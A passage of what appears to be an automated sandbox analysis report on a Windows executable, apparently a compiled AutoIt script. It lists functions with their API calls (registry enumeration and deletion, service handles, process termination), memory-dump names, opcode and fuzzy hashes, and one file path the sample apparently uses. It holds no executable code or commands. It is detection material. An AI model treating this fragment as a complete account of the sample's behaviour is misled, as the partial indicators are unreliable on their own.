          • CloseServiceHandle.ADVAPI32(00000000), ref: 01162FFE
          • GetLastError.KERNEL32 ref: 01163009
          • CloseServiceHandle.ADVAPI32(00000000), ref: 01163019
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
          • String ID:
          • API String ID: 1690418490-0
          • Opcode ID: 61a7550912967930806ab14a5cb82f775641f5da1467cebc5e3e7c6dd8c69bcc
          • Instruction ID: 4aade0ebd12a3812433903c2dd2f7d3c2a23621c275b9db730d3c6bbfd5dd10e
          • Opcode Fuzzy Hash: 61a7550912967930806ab14a5cb82f775641f5da1467cebc5e3e7c6dd8c69bcc
          • Instruction Fuzzy Hash: 51E092316932206BD6391A686C8DBCB3B5EBB1F612F040423F221D6145CB7AA48DDBA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011406E0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
          Download Yara Rule
          APIs
          • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 011406F7
          • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0114071E
          • RegCloseKey.KERNELBASE(?), ref: 01140745
          • RegCloseKey.ADVAPI32(?), ref: 01140759
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Close$OpenQueryValue
          • String ID: Control Panel\Mouse
          • API String ID: 1607946009-824357125
          • Opcode ID: f8a47264fe6c5356945613ef28c3b101f53c4b08fbb63243289a3aebf043220e
          • Instruction ID: 6ce70f9699f6507c11214d7b27f0fdcbefa66ebe5435b413a5d6a6c35539b896
          • Opcode Fuzzy Hash: f8a47264fe6c5356945613ef28c3b101f53c4b08fbb63243289a3aebf043220e
          • Instruction Fuzzy Hash: 39119E76640108FF8B18CFA9E8859EFB7BDEF58300B004599F91CC3200E731AA45CBA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0113FEA7, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: __fread_nolock_fseek_memmove_strcat
          • String ID: AU3!
          • API String ID: 1268643489-3499719025
          • Opcode ID: ff59a382e20cda0749f1f1f08d62e54f9ccf2dc93b27b158be226d8cb5862329
          • Instruction ID: 4a7670788cdcb3182214a11dab58c5d1d8e3a55e9c2c0b4398e91b8b4e8ca241
          • Opcode Fuzzy Hash: ff59a382e20cda0749f1f1f08d62e54f9ccf2dc93b27b158be226d8cb5862329
          • Instruction Fuzzy Hash: 5B119B36D042559FCB09CF68C8C0FED3B69BF89704F1845A8EA55DB242DB309249CBB2
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01171C02, Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
          Download Yara Rule
          APIs
          • RegEnumKeyExW.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,?), ref: 01171C30
          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01171C64
          • RegCloseKey.ADVAPI32(?), ref: 01171C85
          • RegDeleteKeyW.ADVAPI32(?,?), ref: 01171CC7
          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01171CF5
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Enum$CloseDeleteOpen
          • String ID:
          • API String ID: 2095303065-0
          • Opcode ID: b654823d74e19476b73d561cb759473333f85eba9803e2a911337d90c22e9f28
          • Instruction ID: efa260e2a367bedddad5604db2649c3f2e77bebe316449516340e2272241e832
          • Opcode Fuzzy Hash: b654823d74e19476b73d561cb759473333f85eba9803e2a911337d90c22e9f28
          • Instruction Fuzzy Hash: 73317EB2900119BAEB18DBD4DC85EFEB77DEB48304F144169F615A7240E770AA888BA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0113F490, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86COMMON
          Download Yara Rule
          APIs
            • Part of subcall function 0113FE20: _wcslen.LIBCMT ref: 0113FE35
            • Part of subcall function 0113FE20: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,011843ED,?,00000000,?,?), ref: 0113FE4E
            • Part of subcall function 0113FE20: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0113FE77
          • _strcat.LIBCMT ref: 0113F4B6
            • Part of subcall function 0113F540: _strlen.LIBCMT ref: 0113F548
            • Part of subcall function 0113F540: _sprintf.LIBCMT ref: 0113F69E
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
          • String ID: C:\Users\user\77066510\txoxpdjc.qnr$?T
          • API String ID: 3199840319-1321256506
          • Opcode ID: 0d982d1f396716c16f0af11afa971de220c9f7c577984a01223c7eded3a30e9b
          • Instruction ID: 90776afb8300d128a4460f0b77160441a5f668b7e17b9aad8d0d4f39f6a96737
          • Opcode Fuzzy Hash: 0d982d1f396716c16f0af11afa971de220c9f7c577984a01223c7eded3a30e9b
          • Instruction Fuzzy Hash: 6F2127B2A042136BD71CEF749C81A6EF698AF94700F14893AF669C32C1EB34E5548793
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0114F4A4, Relevance: 6.0, APIs: 4, Instructions: 41COMMON
          Download Yara Rule
          APIs
          • GetEnvironmentStringsW.KERNEL32(00000000,01146433), ref: 0114F4A7
          • __malloc_crt.LIBCMT ref: 0114F4D6
          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0114F4E3
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: EnvironmentStrings$Free__malloc_crt
          • String ID:
          • API String ID: 237123855-0
          • Opcode ID: e9d40ca69375dd2af1ea692943098e035eb7a363988bc9e7a7dfbe51196f2d3a
          • Instruction ID: 370c6705470c8e809e6546ddcbbd2eb22315c50b3f8a83b9e3b35ef4c4c6c04d
          • Opcode Fuzzy Hash: e9d40ca69375dd2af1ea692943098e035eb7a363988bc9e7a7dfbe51196f2d3a
          • Instruction Fuzzy Hash: C9F0E2375055125B8B3E6B3CBC488AB2668CBC5A2431E8426F402C3306FF208A8682A1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011414F7, Relevance: 6.0, APIs: 4, Instructions: 41COMMON
          Download Yara Rule
          APIs
          • _malloc.LIBCMT ref: 01141511
            • Part of subcall function 011434DB: __FF_MSGBANNER.LIBCMT ref: 011434F4
            • Part of subcall function 011434DB: __NMSG_WRITE.LIBCMT ref: 011434FB
            • Part of subcall function 011434DB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,01146A35,?,00000001,?,?,01148179,00000018,011BD180,0000000C,01148209), ref: 01143520
          • std::exception::exception.LIBCMT ref: 01141546
          • std::exception::exception.LIBCMT ref: 01141560
          • __CxxThrowException@8.LIBCMT ref: 01141571
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
          • String ID:
          • API String ID: 615853336-0
          • Opcode ID: 8f0ea2dac9ca26b75494ad326dac4c431e296e4c92d9fe845c360ad441a6bcee
          • Instruction ID: 509392e941ffa485ef99bd3e5782a6c308eee40561c015c80f600e59e57d6584
          • Opcode Fuzzy Hash: 8f0ea2dac9ca26b75494ad326dac4c431e296e4c92d9fe845c360ad441a6bcee
          • Instruction Fuzzy Hash: 40F02D7150012ABBDB3CEF65D844AED3EAAAB51E18F144018D415E6180CBB1AA85CB91
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01131D10, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
          Download Yara Rule
          APIs
          • _wcslen.LIBCMT ref: 01131D11
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
          • _memmove.LIBCMT ref: 01131D57
            • Part of subcall function 011414F7: std::exception::exception.LIBCMT ref: 01141546
            • Part of subcall function 011414F7: std::exception::exception.LIBCMT ref: 01141560
            • Part of subcall function 011414F7: __CxxThrowException@8.LIBCMT ref: 01141571
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
          • String ID: @EXITCODE
          • API String ID: 2734553683-3436989551
          • Opcode ID: dca8c1d9956744769987d94792dbffbefbaf3ff94d09cc46bc2fd3d181c45089
          • Instruction ID: 2a86f50f17ddd4c3cb69593a78e9ef29736c52137416967bac199a1613445207
          • Opcode Fuzzy Hash: dca8c1d9956744769987d94792dbffbefbaf3ff94d09cc46bc2fd3d181c45089
          • Instruction Fuzzy Hash: F5F0C2F2A002426FD358DF34CC05B2B79D49B55604F08C82C909AC6740F779E0818B10
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011A5031, Relevance: 4.9, APIs: 3, Instructions: 390COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: a4d5c434b7618b7a771507f03e4e8ec00371271f39a5804d46178a4b079280a2
          • Instruction ID: 9f21b81618abfb358ee876ad2097345b43d8c8daa8d5a16ac8fea3312f58989b
          • Opcode Fuzzy Hash: a4d5c434b7618b7a771507f03e4e8ec00371271f39a5804d46178a4b079280a2
          • Instruction Fuzzy Hash: 68F165756083029FC718DF28C880A5ABBF5FF88318F54895DF9998B352E771E944CB92
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01197629, Relevance: 4.8, APIs: 3, Instructions: 337COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: __wcsicoll
          • String ID:
          • API String ID: 3832890014-0
          • Opcode ID: 683911cfb07ce5638faf6325e57ab6aec471ad41fe980b4219b411493bda1a58
          • Instruction ID: 60e052eae52800bbd7a7a2b340c6e3534fa78ebdc1541133612d85fc5d4a4fea
          • Opcode Fuzzy Hash: 683911cfb07ce5638faf6325e57ab6aec471ad41fe980b4219b411493bda1a58
          • Instruction Fuzzy Hash: 2BA1E87221020A4FDB18EF5DE8849ABBBE4EF95329F14856DED94D7240D7329425CBE0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0115A943, Relevance: 4.7, APIs: 3, Instructions: 224COMMON
          Download Yara Rule
          APIs
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
          • VariantInit.OLEAUT32(00000000), ref: 0115A95F
          • VariantCopy.OLEAUT32(?,?), ref: 0115A969
          • VariantClear.OLEAUT32(00000000), ref: 0115A97A
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Variant$ClearCopyInit_malloc
          • String ID:
          • API String ID: 2981388473-0
          • Opcode ID: e183d7cd64f7c5abf6eb77b0b283f82306b9177c06efbe98ebf937123ca6142f
          • Instruction ID: 404f101b00f54c909b19767336834a54a752a7f917f00bfad5ff15eb25bb221f
          • Opcode Fuzzy Hash: e183d7cd64f7c5abf6eb77b0b283f82306b9177c06efbe98ebf937123ca6142f
          • Instruction Fuzzy Hash: 0D81B170A44300CFEB7DDB1CE4C4B1ABBA1AF85714F184A29D9A9CB314D375E884CB92
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01159B01, Relevance: 4.7, APIs: 3, Instructions: 201COMMON
          Download Yara Rule
          APIs
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
          • _memmove.LIBCMT ref: 01139FE6
          • VariantInit.OLEAUT32(00000000), ref: 01159B15
          • VariantCopy.OLEAUT32(?,?), ref: 01159B23
          • VariantClear.OLEAUT32(00000000), ref: 01159B34
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Variant$ClearCopyInit_malloc_memmove
          • String ID:
          • API String ID: 441919481-0
          • Opcode ID: b25e89fec843c14d90f13a6f605aac66bf08635077b7a478c35d5d534a64245e
          • Instruction ID: 51fccab2439a15c45bf45bdcd1138feb8482523d37bba7795be8c38f1359c908
          • Opcode Fuzzy Hash: b25e89fec843c14d90f13a6f605aac66bf08635077b7a478c35d5d534a64245e
          • Instruction Fuzzy Hash: B1912670609355CFD768CF28C480A1ABBE1FF89308F54896DE9A587355D371E885CB93
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011449DA, Relevance: 4.7, APIs: 3, Instructions: 160COMMON
          Download Yara Rule
          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: __filbuf__getptd_noexit__read_memcpy_s
          • String ID:
          • API String ID: 1794320848-0
          • Opcode ID: da0022d54c5017018d13ecc256ab2e01e62d99c0ac8aad504544f68f7f230e75
          • Instruction ID: 270cb58b5c3d632466a310c415b39fa88aa08da4ecc7838fd510e4c02964bb33
          • Opcode Fuzzy Hash: da0022d54c5017018d13ecc256ab2e01e62d99c0ac8aad504544f68f7f230e75
          • Instruction Fuzzy Hash: 3251E731A00605DBDF3C8FAD884479EBBB1EF50B24F258629E526A35D0D7709A50CB55
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01133868, Relevance: 4.7, APIs: 3, Instructions: 154COMMON
          Download Yara Rule
          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _wcslen
          • String ID:
          • API String ID: 176396367-0
          • Opcode ID: b23b8de8827ffd3ea866857ce951ef3f195a8e85468ce60b8ffd45030b3325e6
          • Instruction ID: c7a9058b1542060365a3bf66835800a0f0e9b98ac44b45b8e67741f20a84a97b
          • Opcode Fuzzy Hash: b23b8de8827ffd3ea866857ce951ef3f195a8e85468ce60b8ffd45030b3325e6
          • Instruction Fuzzy Hash: 7B5117B1918341EAEB69EB6988407AF7BE4BFD1B04F04482DE9D557200EB34D549C7D3
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011A52BA, Relevance: 4.6, APIs: 3, Instructions: 141COMMON
          Download Yara Rule
          APIs
          • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 011A5381
          • TerminateProcess.KERNEL32(00000000), ref: 011A5388
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Process$CurrentTerminate
          • String ID:
          • API String ID: 2429186680-0
          • Opcode ID: 739a6fc3f24800c05710fa9eb54f3fe3a0ec2ffb5f851a23b7b9f52d5364a70d
          • Instruction ID: a3b259e521f43372e34541420eff813c647b8abde250e4225ef69b5f7e7823b4
          • Opcode Fuzzy Hash: 739a6fc3f24800c05710fa9eb54f3fe3a0ec2ffb5f851a23b7b9f52d5364a70d
          • Instruction Fuzzy Hash: AD51CC756083029FCB18EF28D880B6ABBE5FF84308F54891CF9948B341E775E845CB92
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0116297C, Relevance: 4.6, APIs: 3, Instructions: 58COMMON
          Download Yara Rule
          APIs
          • _strlen.LIBCMT ref: 01162991
          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,01184515,00000000,00000000,?,?,?,01184515,?,000000FF), ref: 011629A6
          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,01184515,00000000,00000000,000000FF), ref: 011629E5
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ByteCharMultiWide$_strlen
          • String ID:
          • API String ID: 1433632580-0
          • Opcode ID: 3a7c467672401ab6340ba0fce7524e341b7d538041c124c9f478be4f40268e32
          • Instruction ID: d44153656dafd7fae8432112f9614ea1ae9a14e2a1d69a153030b2d2be3fb68c
          • Opcode Fuzzy Hash: 3a7c467672401ab6340ba0fce7524e341b7d538041c124c9f478be4f40268e32
          • Instruction Fuzzy Hash: C101F7377401153BE719595C9C85FABBB5CDBC4AB4F090125FB1CDB2C0EBB2A84042A0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0113FE20, Relevance: 4.6, APIs: 3, Instructions: 58COMMON
          Download Yara Rule
          APIs
          • _wcslen.LIBCMT ref: 0113FE35
          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,011843ED,?,00000000,?,?), ref: 0113FE4E
          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0113FE77
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ByteCharMultiWide$_wcslen
          • String ID:
          • API String ID: 2761822629-0
          • Opcode ID: 5773fd0503d06ad9a358c40177d1eca310a3a3afdc627fa2cf9449ac93fb4710
          • Instruction ID: e0bee2886115760c8c19c8dce2147c778940b59ff850bdfe7de67ba92e77e521
          • Opcode Fuzzy Hash: 5773fd0503d06ad9a358c40177d1eca310a3a3afdc627fa2cf9449ac93fb4710
          • Instruction Fuzzy Hash: 3B01D672B4021976E23459A95C46F6BB65CCBC6E25F110275FF18A61D0E7A1A80141A6
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01139769, Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
          Download Yara Rule
          APIs
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Message$DispatchPeekTranslate
          • String ID:
          • API String ID: 4217535847-0
          • Opcode ID: 3c0df0df7ddfbcb548112310a610ec7d07b3778901afd44af5c4d82f23af6601
          • Instruction ID: 4eba008be76f5ba1058a6ce54f6c9926d3612a43c3a69990956263b9d16afeed
          • Opcode Fuzzy Hash: 3c0df0df7ddfbcb548112310a610ec7d07b3778901afd44af5c4d82f23af6601
